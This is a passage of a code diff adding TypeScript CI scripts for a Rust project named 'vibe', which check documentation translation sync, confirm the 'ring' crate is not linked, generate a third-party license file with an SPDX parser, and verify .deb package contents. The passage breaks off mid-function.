+    if (isUntranslated) continue;
+
+    const missing: string[] = [];
+    if (!locales.has("en")) missing.push(`${base}.md`);
+    for (const locale of MARKDOWN_LOCALES) {
+      if (!locales.has(locale)) missing.push(`${base}.${locale}.md`);
+    }
+    if (missing.length > 0) problems.push({ base, missing });
+  }
+  return problems;
+}
+
+/** Relative `.mdx` paths under `dir` (recursively), using `/` separators. */
+export function collectMdxFiles(dir: string): string[] {
+  const found: string[] = [];
+
+  const walk = (current: string): void => {
+    for (const entry of readdirSync(current, { withFileTypes: true })) {
+      const isIgnored = entry.isDirectory() && IGNORED_DIRS.has(entry.name);
+      if (isIgnored) continue;
+
+      const full = join(current, entry.name);
+      if (entry.isDirectory()) {
+        walk(full);
+        continue;
+      }
+      if (entry.isFile() && entry.name.endsWith(".mdx")) {
+        found.push(toPosix(relative(dir, full)));
+      }
+    }
+  };
+
+  walk(dir);
+  return found.sort();
+}
+
+export interface DocsSetProblem {
+  locale: string;
+  /** Pages present in English but absent from this locale. */
+  missing: string[];
+  /** Pages present in this locale but absent from English. */
+  extra: string[];
+}
+
+/**
+ * Compares the English page set against each locale's page set. Both directions
+ * are reported: an orphan translation (no English original) is as much a
+ * synchronization failure as a missing one, and only the two-way check catches
+ * a page that was renamed in one locale.
+ */
+export function diffDocsLocaleSets(
+  englishPages: string[],
+  localePages: Record<string, string[]>,
+): DocsSetProblem[] {
+  const english = new Set(englishPages);
+  const problems: DocsSetProblem[] = [];
+
+  for (const [locale, pages] of Object.entries(localePages)) {
+    const translated = new Set(pages);
+    const missing = [...english].filter((p) => !translated.has(p)).sort();
+    const extra = [...translated].filter((p) => !english.has(p)).sort();
+    if (missing.length > 0 || extra.length > 0) problems.push({ locale, missing, extra });
+  }
+  return problems;
+}
+
+/** The sibling markdown paths a file of `locale` must link to, by base name. */
+export function expectedSiblingLinks(base: string, locale: string): string[] {
+  const fileName = base.split("/").pop() ?? base;
+  const all = [`${fileName}.md`, ...MARKDOWN_LOCALES.map((l) => `${fileName}.${l}.md`)];
+  const self = locale === "en" ? `${fileName}.md` : `${fileName}.${locale}.md`;
+  return all.filter((f) => f !== self);
+}
+
+/**
+ * True when the header links to the given sibling file. Matches the target
+ * inside a markdown link, with or without the `./` prefix, so all three header
+ * stylings in the repo satisfy the same check.
+ */
+export function headerLinksTo(header: string, target: string): boolean {
+  return header.includes(`(./${target})`) || header.includes(`(${target})`);
+}
+
+export interface LinkProblem {
+  file: string;
+  /** Sibling files that are not linked from the header. */
+  missingLinks: string[];
+}
+
+/**
+ * Verifies that the first LINK_HEADER_LINES lines of `content` link to both
+ * other languages. `path` is the file's repo-relative path; `read` is injected
+ * so tests can drive this from a fixture map instead of the filesystem.
+ */
+export function checkCrossLinks(files: string[], read: (path: string) => string): LinkProblem[] {
+  const problems: LinkProblem[] = [];
+  const markdown = files.filter((f) => markdownBase(f) !== null);
+
+  const bases = new Map<string, Set<string>>();
+  for (const file of markdown) {
+    const base = markdownBase(file);
+    if (base === null) continue;
+    const locales = bases.get(base) ?? new Set<string>();
+    locales.add(markdownLocale(file));
+    bases.set(base, locales);
+  }
+
+  for (const file of [...markdown].sort()) {
+    const base = markdownBase(file);
+    if (base === null) continue;
+    const locales = bases.get(base);
+    // Untranslated documents have no counterparts to link to.
+    if (!locales || (locales.size === 1 && locales.has("en"))) continue;
+
+    const header = read(file).split("\n").slice(0, LINK_HEADER_LINES).join("\n");
+    const missingLinks = expectedSiblingLinks(base, markdownLocale(file)).filter(
+      (target) => !headerLinksTo(header, target),
+    );
+    if (missingLinks.length > 0) problems.push({ file, missingLinks });
+  }
+  return problems;
+}
+
+const DOCS_CONTENT_DIR = join("packages", "docs", "src", "content", "docs");
+
+/** Everything the check found wrong, as printable lines. Empty means success. */
+export function collectFailures(root: string): string[] {
+  const failures: string[] = [];
+  const markdownFiles = collectMarkdownFiles(root);
+
+  for (const { base, missing } of findIncompleteTriplets(markdownFiles)) {
+    failures.push(`${base}: missing ${missing.join(", ")}`);
+  }
+
+  for (const { file, missingLinks } of checkCrossLinks(markdownFiles, (p) =>
+    readFileSync(join(root, p), "utf-8"),
+  )) {
+    failures.push(
+      `${file}: header (first ${LINK_HEADER_LINES} lines) does not link to ${missingLinks.join(", ")}`,
+    );
+  }
+
+  const contentRoot = join(root, DOCS_CONTENT_DIR);
+  const localeDirs = new Set<string>(DOCS_LOCALE_DIRS);
+  const englishPages = collectMdxFiles(contentRoot).filter(
+    (p) => !localeDirs.has(p.split("/")[0] ?? ""),
+  );
+
+  const localePages: Record<string, string[]> = {};
+  for (const locale of DOCS_LOCALE_DIRS) {
+    const dir = join(contentRoot, locale);
+    const exists = safeIsDirectory(dir);
+    localePages[locale] = exists ? collectMdxFiles(dir) : [];
+    if (!exists) failures.push(`${DOCS_CONTENT_DIR}/${locale}: locale directory does not exist`);
+  }
+
+  for (const { locale, missing, extra } of diffDocsLocaleSets(englishPages, localePages)) {
+    for (const page of missing) {
+      failures.push(`${DOCS_CONTENT_DIR}/${locale}/${page}: missing translation`);
+    }
+    for (const page of extra) {
+      failures.push(`${DOCS_CONTENT_DIR}/${page}: missing English original for ${locale}/${page}`);
+    }
+  }
+
+  return failures;
+}
+
+function safeIsDirectory(path: string): boolean {
+  try {
+    return statSync(path).isDirectory();
+  } catch {
+    return false;
+  }
+}
+
+function main(): void {
+  const root = process.cwd();
+  const failures = collectFailures(root);
+
+  if (failures.length > 0) {
+    console.error("✗ documentation i18n is out of sync:");
+    for (const failure of failures) console.error(`  - ${failure}`);
+    console.error(
+      "\nSee .claude/rules/markdown.md and .claude/rules/docs-i18n.md: every translated document must exist in en, ja and zh, and link to its counterparts.",
+    );
+    process.exit(1);
+  }
+
+  console.log("✓ documentation i18n is in sync (en / ja / zh).");
+}
+
+if (import.meta.main) {
+  main();
+}

--- a/scripts/check-ring-unlinked.ts
+++ b/scripts/check-ring-unlinked.ts
@@ -1,0 +1,65 @@
+#!/usr/bin/env bun
+
+/**
+ * Assert that no crate in the workspace actually depends on `ring`.
+ *
+ * vibe's TLS stack elects aws-lc-rs; `ring` appears in `cargo metadata`'s
+ * conservative full graph (it is an optional/alternative backend that nothing
+ * selects) but must never end up linked into the shipped binary. `cargo tree -i`
+ * inverts the graph and prints the dependents of a package, so an empty result
+ * ("nothing to print") is the proof that the link never happens.
+ *
+ * Why this is a separate check rather than an assertion about
+ * THIRD-PARTY-LICENSES.md: `ring` is licensed `Apache-2.0 AND ISC`, so it now
+ * legitimately appears in that file's notice appendix. Its presence there says
+ * only that the conservative crate list contains it — it is no longer evidence
+ * either way about linkage, and reading it as such would silently retire the
+ * signal this check exists to provide.
+ *
+ * Usage:
+ *   bun run scripts/check-ring-unlinked.ts
+ */
+
+import { execFile } from "node:child_process";
+import { promisify } from "node:util";
+
+const execFileAsync = promisify(execFile);
+
+const FORBIDDEN_CRATE = "ring";
+const MANIFEST = "rust/Cargo.toml";
+
+/**
+ * True when `cargo tree -i` reported no dependents. cargo prints the
+ * "nothing to print" notice on stderr and leaves stdout empty; a real dependent
+ * would be a tree on stdout.
+ */
+export function hasNoDependents(stdout: string): boolean {
+  return stdout.trim() === "";
+}
+
+async function main(): Promise<void> {
+  const { stdout } = await execFileAsync("cargo", [
+    "tree",
+    "-i",
+    FORBIDDEN_CRATE,
+    "--manifest-path",
+    MANIFEST,
+  ]);
+
+  if (!hasNoDependents(stdout)) {
+    console.error(
+      `✗ ${FORBIDDEN_CRATE} is reachable from the workspace; vibe's TLS stack must stay on aws-lc-rs:`,
+    );
+    console.error(stdout.trimEnd());
+    process.exit(1);
+  }
+
+  console.log(`✓ ${FORBIDDEN_CRATE} has no dependents in the workspace (not linked).`);
+}
+
+if (import.meta.main) {
+  main().catch((err: unknown) => {
+    console.error(`check-ring-unlinked: ${err instanceof Error ? err.message : String(err)}`);
+    process.exit(1);
+  });
+}

--- a/scripts/generate-third-party-licenses.ts
+++ b/scripts/generate-third-party-licenses.ts
@@ -10,6 +10,11 @@
  * `cargo metadata` (already available) and rendered to a checked-in Markdown
  * file that the per-platform npm packages ship via their `files` list.
  *
+ * Crates whose SPDX expression is a top-level `AND` conjunction impose
+ * obligations that cannot be side-stepped by electing one arm of an `OR`
+ * (Apache-2.0's §4 notice requirement, most notably). For those the appendix
+ * reproduces the crate's own LICENSE/NOTICE files verbatim.
+ *
  * Usage:
  *   bun run scripts/generate-third-party-licenses.ts          # write the file
  *   bun run scripts/generate-third-party-licenses.ts --check  # fail if stale
@@ -17,25 +22,345 @@
  * Run this whenever rust/Cargo.lock changes (a dependency add/remove/bump).
  */
 
-import { readFile, writeFile } from "node:fs/promises";
+import { readFile, readdir, writeFile, lstat, realpath } from "node:fs/promises";
 import { execFile } from "node:child_process";
 import { promisify } from "node:util";
+import { dirname, join, relative, isAbsolute } from "node:path";
 
 const execFileAsync = promisify(execFile);
 
 const OUTPUT = "THIRD-PARTY-LICENSES.md";
 const OWN_CRATES = new Set(["vibe", "vibe-core", "vibe-native", "vibe-test-support"]);
 
+/** Names a crate may use for a shipped license/notice file, at its root only. */
+const NOTICE_FILE_PATTERN = /^(LICENSE|LICENCE|NOTICE|COPYING)([-._].*)?$/i;
+
+/** Per-file ceiling for a reproduced notice. */
+const MAX_NOTICE_BYTES = 1024 * 1024;
+
 interface CargoPackage {
   name: string;
   version: string;
   license: string | null;
   license_file: string | null;
+  manifest_path: string;
 }
 
 interface CargoMetadata {
   packages: CargoPackage[];
 }
+
+/** A crate's reproduced notice file: its basename and normalized UTF-8 text. */
+export interface NoticeFile {
+  name: string;
+  text: string;
+}
+
+/** One appendix entry: a crate with a non-electable obligation, plus its notices. */
+export interface NoticeEntry {
+  name: string;
+  version: string;
+  license: string;
+  files: NoticeFile[];
+}
+
+// --- SPDX ------------------------------------------------------------------
+
+/**
+ * Normalize the deprecated `/` shorthand (`MIT/Apache-2.0`) into ` OR `.
+ * crates.io still carries these in older manifests, and the parser below only
+ * understands the modern operators.
+ */
+export function normalizeSpdx(expr: string): string {
+  return expr.replace(/\//g, " OR ").replace(/\s+/g, " ").trim();
+}
+
+/** A parsed SPDX expression: a license atom or a binary conjunction/disjunction. */
+export type SpdxNode =
+  | { kind: "license"; id: string }
+  | { kind: "and"; operands: SpdxNode[] }
+  | { kind: "or"; operands: SpdxNode[] };
+
+function tokenizeSpdx(expr: string): string[] {
+  const tokens: string[] = [];
+  let i = 0;
+  while (i < expr.length) {
+    const ch = expr[i];
+    if (ch === " ") {
+      i++;
+      continue;
+    }
+    if (ch === "(" || ch === ")") {
+      tokens.push(ch);
+      i++;
+      continue;
+    }
+    let j = i;
+    while (j < expr.length && expr[j] !== " " && expr[j] !== "(" && expr[j] !== ")") {
+      j++;
+    }
+    tokens.push(expr.slice(i, j));
+    i = j;
+  }
+  return tokens;
+}
+
+/**
+ * Minimal recursive-descent SPDX parser. Precedence is WITH > AND > OR, per the
+ * SPDX license-expression grammar; `<id> WITH <exception>` is folded into a
+ * single atom because the exception never changes which obligations apply.
+ */
+export function parseSpdx(expr: string): SpdxNode {
+  const tokens = tokenizeSpdx(normalizeSpdx(expr));
+  let pos = 0;
+
+  const peek = (): string | undefined => tokens[pos];
+  const isOperator = (token: string | undefined, name: string): boolean =>
+    token !== undefined && token.toUpperCase() === name;
+
+  function parseAtom(): SpdxNode {
+    const token = peek();
+    if (token === undefined) {
+      throw new Error(`unexpected end of SPDX expression: ${expr}`);
+    }
+    if (token === "(") {
+      pos++;
+      const inner = parseOr();
+      if (peek() !== ")") {
+        throw new Error(`unbalanced parenthesis in SPDX expression: ${expr}`);
+      }
+      pos++;
+      return inner;
+    }
+    if (token === ")") {
+      throw new Error(`unexpected ')' in SPDX expression: ${expr}`);
+    }
+    pos++;
+    let id = token;
+    if (isOperator(peek(), "WITH")) {
+      pos++;
+      const exception = peek();
+      if (exception === undefined) {
+        throw new Error(`WITH without an exception in SPDX expression: ${expr}`);
+      }
+      pos++;
+      id = `${id} WITH ${exception}`;
+    }
+    return { kind: "license", id };
+  }
+
+  function parseAnd(): SpdxNode {
+    const operands = [parseAtom()];
+    while (isOperator(peek(), "AND")) {
+      pos++;
+      operands.push(parseAtom());
+    }
+    return operands.length === 1 ? operands[0] : { kind: "and", operands };
+  }
+
+  function parseOr(): SpdxNode {
+    const operands = [parseAnd()];
+    while (isOperator(peek(), "OR")) {
+      pos++;
+      operands.push(parseAnd());
+    }
+    return operands.length === 1 ? operands[0] : { kind: "or", operands };
+  }
+
+  const node = parseOr();
+  if (pos !== tokens.length) {
+    throw new Error(`trailing tokens in SPDX expression: ${expr}`);
+  }
+  return node;
+}
+
+/**
+ * True when the expression's top-level operator is `AND`: every conjunct binds,
+ * so no choice of `OR` arm can shed the obligation.
+ *
+ * Why not solve for the cheapest satisfying assignment (e.g. an `AND` whose
+ * conjuncts are all `OR`s that share one electable license)? That analysis has
+ * no subject in the current graph — no dependency is an electable-AND — so it
+ * would be untested machinery guarding a case that does not exist. The
+ * conservative answer only ever over-reproduces notices, which is safe.
+ */
+export function hasNonElectableObligation(expr: string): boolean {
+  return parseSpdx(expr).kind === "and";
+}
+
+// --- Notice files ----------------------------------------------------------
+
+/**
+ * List the license/notice files a crate ships at its root, sorted by name.
+ *
+ * Symlinks are excluded outright rather than resolved: a crate tarball that
+ * pointed LICENSE at /etc/shadow would otherwise have its target inlined into a
+ * committed, published document. The realpath containment check is the second
+ * layer, covering a root that is itself reached through a link.
+ */
+export async function discoverNoticeFiles(crateDir: string): Promise<string[]> {
+  const entries = await readdir(crateDir).catch(() => [] as string[]);
+  const candidates = entries.filter((name) => NOTICE_FILE_PATTERN.test(name)).sort();
+
+  const crateReal = await realpath(crateDir);
+  const found: string[] = [];
+  for (const name of candidates) {
+    const abs = join(crateDir, name);
+    const stats = await lstat(abs).catch(() => null);
+    const isPlainFile = stats !== null && stats.isFile() && !stats.isSymbolicLink();
+    if (!isPlainFile) {
+      continue;
+    }
+    const real = await realpath(abs).catch(() => null);
+    if (real === null) {
+      continue;
+    }
+    const rel = relative(crateReal, real);
+    const escapesCrate = rel.startsWith("..") || isAbsolute(rel);
+    if (escapesCrate) {
+      continue;
+    }
+    found.push(name);
+  }
+  return found;
+}
+
+/**
+ * Read a notice file and normalize it for embedding: strip a leading BOM,
+ * convert CRLF to LF, and end with exactly one newline.
+ *
+ * Rejects (rather than repairs) anything unfit for a Markdown code block —
+ * oversized, non-UTF-8, or carrying control characters. Silent truncation or
+ * sanitization would publish a license text that is not the one the crate
+ * shipped, which is the exact failure this appendix exists to prevent.
+ *
+ * Error messages name the crate and file only: echoing the offending bytes
+ * would push attacker-controlled content into CI logs.
+ */
+export function normalizeNoticeText(raw: Buffer, label: string): string {
+  if (raw.byteLength > MAX_NOTICE_BYTES) {
+    throw new Error(
+      `${label}: notice file is ${raw.byteLength} bytes, over the ${MAX_NOTICE_BYTES}-byte limit`,
+    );
+  }
+
+  let text: string;
+  try {
+    text = new TextDecoder("utf-8", { fatal: true }).decode(raw);
+  } catch {
+    throw new Error(`${label}: notice file is not valid UTF-8`);
+  }
+
+  if (text.charCodeAt(0) === 0xfeff) {
+    text = text.slice(1);
+  }
+  text = text.replace(/\r\n/g, "\n");
+
+  // Everything in C0 except tab and newline, plus DEL and any lone CR left over.
+  // Why not rewrite this without control characters (no-control-regex): matching
+  // them IS the check — a notice carrying NUL or an ANSI escape must be rejected,
+  // and the rule's usual concern (an accidental literal in a text pattern) does
+  // not apply to a range written deliberately as escapes.
+  // oxlint-disable-next-line no-control-regex
+  const hasForbiddenControl = /[\u0000-\u0008\u000b-\u001f\u007f]/.test(text);
+  if (hasForbiddenControl) {
+    throw new Error(`${label}: notice file contains disallowed control characters`);
+  }
+
+  return `${text.replace(/\n+$/, "")}\n`;
+}
+
+async function readNoticeFile(crateDir: string, name: string, label: string): Promise<NoticeFile> {
+  const raw = await readFile(join(crateDir, name));
+  return { name, text: normalizeNoticeText(raw, `${label}/${name}`) };
+}
+
+// --- Rendering -------------------------------------------------------------
+
+/**
+ * The fence for a code block must be longer than the longest backtick run in
+ * its content, anywhere on a line — not just at line start. aws-lc-sys's LICENSE
+ * already contains a ``` run, so a fixed three-backtick fence breaks the
+ * document against today's dependency graph, not some hypothetical future one.
+ */
+export function fenceFor(content: string): string {
+  let longest = 0;
+  for (const run of content.match(/`+/g) ?? []) {
+    longest = Math.max(longest, run.length);
+  }
+  return "`".repeat(Math.max(3, longest + 1));
+}
+
+/** Render the appendix reproducing each obligated crate's shipped notices. */
+export function renderNoticeAppendix(entries: NoticeEntry[]): string {
+  const lines: string[] = [];
+  lines.push("## Appendix: License texts and notices for non-electable obligations");
+  lines.push("");
+  lines.push("Most crates above are offered under an `OR` choice, and vibe's distribution");
+  lines.push("elects the permissive arm. The crates in this appendix are different: their");
+  lines.push("SPDX expression is a top-level `AND` conjunction, so every conjunct binds and");
+  lines.push("no election can shed it. Their obligations therefore travel with the shipped");
+  lines.push("binary, and the license and notice files each crate distributes are reproduced");
+  lines.push("below verbatim, exactly as published on crates.io.");
+  lines.push("");
+  lines.push("Like the table above, this appendix is drawn from the conservative full");
+  lines.push("dependency graph, so it may reproduce notices for crates that are not linked");
+  lines.push("into any shipped binary. Reproducing a notice is not a representation that the");
+  lines.push("crate is present in a given build.");
+  lines.push("");
+
+  for (const entry of entries) {
+    lines.push(`### ${entry.name} ${entry.version} — ${entry.license}`);
+    lines.push("");
+    for (const file of entry.files) {
+      const fence = fenceFor(file.text);
+      lines.push(`#### ${file.name}`);
+      lines.push("");
+      lines.push(fence);
+      lines.push(file.text.replace(/\n$/, ""));
+      lines.push(fence);
+      lines.push("");
+    }
+  }
+
+  return lines.join("\n");
+}
+
+/** Render the whole document: preamble, crate table, and the notice appendix. */
+export function render(deps: CargoPackage[], entries: NoticeEntry[]): string {
+  const lines: string[] = [];
+  lines.push("# Third-Party Licenses");
+  lines.push("");
+  lines.push("The `vibe` binary is written in Rust and statically links the crates listed");
+  lines.push("below. Each is distributed under a permissive license (MIT, Apache-2.0, ISC,");
+  lines.push("BSD-3-Clause, Zlib, Unlicense, CC0-1.0, Unicode-3.0, CDLA-Permissive-2.0, or a");
+  lines.push("dual/multi-license `OR` of these). Where a crate is multi-licensed with `OR`,");
+  lines.push("vibe's distribution elects the permissive option.");
+  lines.push("");
+  lines.push("Some crates are licensed under a top-level `AND` conjunction instead. Those");
+  lines.push("obligations cannot be elected away, so the license and notice files those");
+  lines.push("crates ship are reproduced in full in the appendix at the end of this file.");
+  lines.push("");
+  lines.push("This list is generated from `cargo metadata` over `rust/Cargo.lock` by");
+  lines.push("`scripts/generate-third-party-licenses.ts`. It is the full dependency graph,");
+  lines.push("including platform-gated crates (e.g. Windows/wasm) that are not linked into");
+  lines.push("every shipped binary; listing them all is intentionally conservative.");
+  lines.push("");
+  lines.push("| Crate | Version | License (SPDX) |");
+  lines.push("| ----- | ------- | -------------- |");
+  for (const dep of deps) {
+    lines.push(`| ${dep.name} | ${dep.version} | ${licenseOf(dep)} |`);
+  }
+  lines.push("");
+  lines.push(renderNoticeAppendix(entries));
+  return lines.join("\n");
+}
+
+function licenseOf(pkg: CargoPackage): string {
+  return pkg.license ?? (pkg.license_file ? `see ${pkg.license_file}` : "UNKNOWN");
+}
+
+// --- Driver ----------------------------------------------------------------
 
 async function loadDependencies(): Promise<CargoPackage[]> {
   const { stdout } = await execFileAsync("cargo", ["metadata", "--format-version", "1"], {
@@ -48,53 +373,105 @@ async function loadDependencies(): Promise<CargoPackage[]> {
   return deps;
 }
 
-function render(deps: CargoPackage[]): string {
-  const lines: string[] = [];
-  lines.push("# Third-Party Licenses");
-  lines.push("");
-  lines.push("The `vibe` binary is written in Rust and statically links the crates listed");
-  lines.push("below. Each is distributed under a permissive license (MIT, Apache-2.0, ISC,");
-  lines.push("BSD-3-Clause, Zlib, Unlicense, CC0-1.0, Unicode-3.0, CDLA-Permissive-2.0, or a");
-  lines.push("dual/multi-license `OR` of these). Where a crate is multi-licensed, vibe's");
-  lines.push("distribution elects the permissive option.");
-  lines.push("");
-  lines.push("This list is generated from `cargo metadata` over `rust/Cargo.lock` by");
-  lines.push("`scripts/generate-third-party-licenses.ts`. It is the full dependency graph,");
-  lines.push("including platform-gated crates (e.g. Windows/wasm) that are not linked into");
-  lines.push("every shipped binary; listing them all is intentionally conservative.");
-  lines.push("");
-  lines.push("| Crate | Version | License (SPDX) |");
-  lines.push("| ----- | ------- | -------------- |");
+/**
+ * Collect the appendix entries for every dependency whose SPDX expression
+ * carries a non-electable obligation, in the same name→version order as the
+ * table so the rendered document is byte-stable across runs and platforms.
+ */
+async function collectNoticeEntries(deps: CargoPackage[]): Promise<NoticeEntry[]> {
+  const entries: NoticeEntry[] = [];
   for (const dep of deps) {
-    const license = dep.license ?? (dep.license_file ? `see ${dep.license_file}` : "UNKNOWN");
-    lines.push(`| ${dep.name} | ${dep.version} | ${license} |`);
+    const license = dep.license;
+    if (license === null || !hasNonElectableObligation(license)) {
+      continue;
+    }
+
+    const label = `${dep.name} ${dep.version}`;
+    const crateDir = dirname(dep.manifest_path);
+    const names = await discoverNoticeFiles(crateDir);
+    if (names.length === 0) {
+      throw new Error(
+        `${label} has a non-electable obligation (${license}) but ships no ` +
+          `LICENSE/NOTICE/COPYING file at its crate root; its terms cannot be reproduced`,
+      );
+    }
+
+    const files: NoticeFile[] = [];
+    for (const name of names) {
+      files.push(await readNoticeFile(crateDir, name, label));
+    }
+    entries.push({ name: dep.name, version: dep.version, license, files });
   }
-  lines.push("");
-  return lines.join("\n");
+  return entries;
+}
+
+/**
+ * Locate the first differing line between the committed and regenerated
+ * documents. The file runs past a thousand lines of reproduced license text, so
+ * a bare "is stale" leaves the reader diffing by hand to find what moved.
+ */
+export function describeFirstDifference(existing: string, generated: string): string {
+  const a = existing.split("\n");
+  const b = generated.split("\n");
+  const shared = Math.min(a.length, b.length);
+  for (let i = 0; i < shared; i++) {
+    if (a[i] !== b[i]) {
+      return `first difference at line ${i + 1}`;
+    }
+  }
+  if (a.length !== b.length) {
+    const verb = b.length > a.length ? "adds" : "removes";
+    return `identical through line ${shared}; regeneration ${verb} ${Math.abs(b.length - a.length)} line(s)`;
+  }
+  return "content differs";
 }
 
 async function main(): Promise<void> {
   const checkOnly = process.argv.slice(2).includes("--check");
   const deps = await loadDependencies();
-  const content = render(deps);
+  const entries = await collectNoticeEntries(deps);
+
+  // Why not tolerate an empty appendix: today's graph has four obligated
+  // crates, so zero means the SPDX parser regressed and stopped recognizing
+  // `AND` — a failure whose whole symptom is that the appendix silently
+  // vanishes while the run still exits 0.
+  if (entries.length === 0) {
+    throw new Error(
+      "no crate with a non-electable obligation was found; the SPDX analysis has regressed " +
+        "(the dependency graph is expected to contain top-level AND expressions)",
+    );
+  }
+
+  const content = render(deps, entries);
 
   if (checkOnly) {
-    const existing = await readFile(OUTPUT, "utf-8").catch(() => "");
+    const raw = await readFile(OUTPUT, "utf-8").catch(() => "");
+    // Compare against LF-normalized text. .gitattributes pins this file to LF,
+    // but a Windows checkout that predates it (or ignores it) would otherwise
+    // report a stale file whose only difference is the line ending.
+    const existing = raw.replace(/\r\n/g, "\n");
     if (existing !== content) {
-      console.error(`${OUTPUT} is stale. Run: bun run scripts/generate-third-party-licenses.ts`);
+      const where = describeFirstDifference(existing, content);
+      console.error(
+        `${OUTPUT} is stale (${where}). Run: bun run scripts/generate-third-party-licenses.ts`,
+      );
       process.exit(1);
     }
-    console.log(`${OUTPUT} is up to date (${deps.length} crates).`);
+    console.log(
+      `${OUTPUT} is up to date (${deps.length} crates, ${entries.length} reproduced notices).`,
+    );
     return;
   }
 
   await writeFile(OUTPUT, content, "utf-8");
-  console.log(`Wrote ${OUTPUT} (${deps.length} crates).`);
+  console.log(`Wrote ${OUTPUT} (${deps.length} crates, ${entries.length} reproduced notices).`);
 }
 
-main().catch((err: unknown) => {
-  console.error(
-    `generate-third-party-licenses: ${err instanceof Error ? err.message : String(err)}`,
-  );
-  process.exit(1);
-});
+if (import.meta.main) {
+  main().catch((err: unknown) => {
+    console.error(
+      `generate-third-party-licenses: ${err instanceof Error ? err.message : String(err)}`,
+    );
+    process.exit(1);
+  });
+}

--- a/scripts/verify-deb.ts
+++ b/scripts/verify-deb.ts
@@ -1,0 +1,227 @@
+#!/usr/bin/env bun
+
+/**
+ * Assert that a built .deb carries the binary and the required documentation.
+ *
+ * A .deb that installs /usr/bin/vibe but drops usr/share/doc/vibe/copyright
+ * ships a Debian package with no statement of terms, and one without
+ * THIRD-PARTY-LICENSES.md drops the notices for the Rust crates the binary
+ * statically links. Neither failure is visible from a smoke test of the
+ * installed binary, so this checks the package contents directly.
+ *
+ * Inspection only: `dpkg-deb --contents` / `--fsys-tarfile` read the archive
+ * without installing it, so no sudo (and no mutation of the runner) is needed.
+ *
+ * Usage:
+ *   bun run scripts/verify-deb.ts vibe_1.2.3_amd64.deb
+ */
+
+import { execFile, spawn } from "node:child_process";
+import { promisify } from "node:util";
+import { once } from "node:events";
+import { resolve, relative, isAbsolute } from "node:path";
+
+const execFileAsync = promisify(execFile);
+
+const BINARY_PATH = "usr/bin/vibe";
+const COPYRIGHT_PATH = "usr/share/doc/vibe/copyright";
+const NOTICES_PATH = "usr/share/doc/vibe/THIRD-PARTY-LICENSES.md";
+
+/** Substrings each documentation file must contain to count as the real thing. */
+const COPYRIGHT_MARKERS = [
+  "Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/",
+  "License: MIT",
+  "Permission is hereby granted, free of charge",
+];
+const NOTICES_MARKERS = ["TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION"];
+
+/** One entry of `dpkg-deb --contents`: the member path and its mode string. */
+export interface DebEntry {
+  path: string;
+  mode: string;
+}
+
+/**
+ * Parse `dpkg-deb --contents` output. Lines look like
+ *   -rwxr-xr-x root/root  5242880 2025-01-01 00:00 ./usr/bin/vibe
+ * The leading `./` is stripped so callers compare against plain archive paths.
+ *
+ * Why not take the last whitespace-separated field as the name: paths may
+ * contain spaces, which would truncate the member to its last word and report a
+ * required file as missing. Only the first five fields (mode, owner, size, date,
+ * time) are fixed-width-ish; everything after them is the name, so the name is
+ * rejoined rather than indexed.
+ */
+export function parseDebContents(stdout: string): DebEntry[] {
+  const entries: DebEntry[] = [];
+  for (const line of stdout.split("\n")) {
+    const trimmed = line.trim();
+    if (trimmed === "") {
+      continue;
+    }
+    const fields = trimmed.split(/\s+/);
+    const hasEnoughFields = fields.length >= 6;
+    if (!hasEnoughFields) {
+      continue;
+    }
+    const mode = fields[0];
+    // A symlink/hardlink line reads `<name> -> <target>`; the member is
+    // everything before the arrow. Otherwise the name runs to end of line.
+    const arrowIndex = fields.indexOf("->", 5);
+    const nameFields = arrowIndex === -1 ? fields.slice(5) : fields.slice(5, arrowIndex);
+    const rawPath = nameFields.join(" ");
+    if (rawPath === "") {
+      continue;
+    }
+    entries.push({ path: rawPath.replace(/^\.\//, ""), mode });
+  }
+  return entries;
+}
+
+/** True when a `dpkg-deb --contents` mode string denotes a regular file. */
+export function isRegularFile(mode: string): boolean {
+  return mode.startsWith("-");
+}
+
+/** True when a `dpkg-deb --contents` mode string carries any execute bit. */
+export function isExecutable(mode: string): boolean {
+  return mode.slice(1).includes("x");
+}
+
+/**
+ * Check the archive listing for the required members. Pure so it can be
+ * unit-tested without dpkg. Returns the list of problems (empty = OK).
+ *
+ * Each required member must be a REGULAR file: `dpkg-deb --contents` lists
+ * directories and symlinks in the same table, so a bare presence check would
+ * accept a directory named usr/bin/vibe, or a copyright symlink pointing
+ * somewhere that is not shipped in the package at all.
+ */
+export function findContentProblems(entries: DebEntry[]): string[] {
+  const byPath = new Map(entries.map((e) => [e.path, e]));
+  const problems: string[] = [];
+
+  for (const required of [BINARY_PATH, COPYRIGHT_PATH, NOTICES_PATH]) {
+    const entry = byPath.get(required);
+    if (!entry) {
+      problems.push(`missing required file: ${required}`);
+      continue;
+    }
+    if (!isRegularFile(entry.mode)) {
+      problems.push(`${required} is not a regular file (mode ${entry.mode})`);
+    }
+  }
+
+  const binary = byPath.get(BINARY_PATH);
+  const isNonExecutableFile = binary && isRegularFile(binary.mode) && !isExecutable(binary.mode);
+  if (isNonExecutableFile) {
+    problems.push(`${BINARY_PATH} is not executable (mode ${binary.mode})`);
+  }
+
+  return problems;
+}
+
+/** Check a documentation file's text for the markers that identify it. */
+export function findMarkerProblems(path: string, content: string, markers: string[]): string[] {
+  return markers
+    .filter((marker) => !content.includes(marker))
+    .map((marker) => `${path} does not contain: ${marker}`);
+}
+
+/**
+ * Resolve the .deb argument and require it to stay under the working directory.
+ * The path reaches this script from CI job inputs, and reading an arbitrary
+ * absolute path would let a crafted value point the verifier at a file outside
+ * the workspace that it then reports on.
+ */
+export function resolveDebPath(arg: string, cwd: string): string {
+  const abs = resolve(cwd, arg);
+  const rel = relative(cwd, abs);
+  const escapes = rel === "" || rel.startsWith("..") || isAbsolute(rel);
+  if (escapes) {
+    throw new Error(`.deb path must be inside the working directory: ${arg}`);
+  }
+  return abs;
+}
+
+/**
+ * Read one member's text out of the .deb without unpacking it to disk.
+ *
+ * Why not `sh -c 'dpkg-deb --fsys-tarfile ... | tar -xO ...'`: that would put a
+ * caller-supplied path through a shell. The two processes are spawned with argv
+ * arrays instead and wired together in-process.
+ */
+async function readMember(debPath: string, member: string): Promise<string> {
+  const dpkg = spawn("dpkg-deb", ["--fsys-tarfile", debPath], {
+    stdio: ["ignore", "pipe", "inherit"],
+  });
+  const tar = spawn("tar", ["-xO", `./${member}`], {
+    stdio: ["pipe", "pipe", "inherit"],
+  });
+  dpkg.stdout.pipe(tar.stdin);
+
+  const chunks: Buffer[] = [];
+  tar.stdout.on("data", (chunk: Buffer) => chunks.push(chunk));
+
